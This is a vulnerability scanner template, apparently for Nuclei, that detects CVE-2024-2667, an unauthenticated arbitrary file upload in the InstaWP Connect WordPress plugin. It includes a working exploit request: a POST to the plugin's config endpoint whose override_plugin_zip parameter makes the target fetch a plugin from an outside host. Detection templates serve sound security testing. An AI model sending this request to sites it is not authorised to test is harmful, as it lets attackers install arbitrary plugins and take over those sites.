id: CVE-2024-2667 info: name: InstaWP Connect <= 0.1.0.22 - Unauthenticated Arbitrary File Upload author: DhiyaneshDK severity: critical description: | The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files. impact: | Unauthenticated attackers can install and activate arbitrary WordPress plugins including vulnerable or malicious ones via the InstaWP Connect REST API endpoint. remediation: | Update InstaWP Connect plugin to version 0.1.0.23 or later. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/id/f6aead8d-c136-4952-ad03-86fe0f144dea?source=cve - https://github.com/Nxploited/CVE-2024-2667-Poc - https://github.com/Puvipavan/CVE-2024-2667 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-2667 cwe-id: CWE-434 epss-score: 0.90708 epss-percentile: 0.99641 cpe: cpe:2.3:a:instawp:instawp_connect:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: instawp product: instawp_connect framework: wordpress fofa-query: body="/wp-content/plugins/instawp-connect/" tags: cve,cve2024,wordpress,wp-plugin,wp,instawp-connect,intrusive,file-upload,vkev,vuln http: - raw: - | POST /?rest_route=/instawp-connect/v1/config HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded api_key={{randstr}}&override_plugin_zip=http://{{interactsh-url}} matchers-condition: and matchers: - type: word part: body words: - '"status":true' - '"message":' condition: and - type: word part: content_type words: - 'application/json' - type: status status: - 200 # digest: 4a0a0047304502210095d4367066e0bbf84f51c907608496a2ac046064bb83b57b6f73dc1664ef0f930220585c508d3e4f9791af7b248aa0021e70749303f3a59c855a0116a766d5a8624a:922c64590222798bb761d5b6d8e72950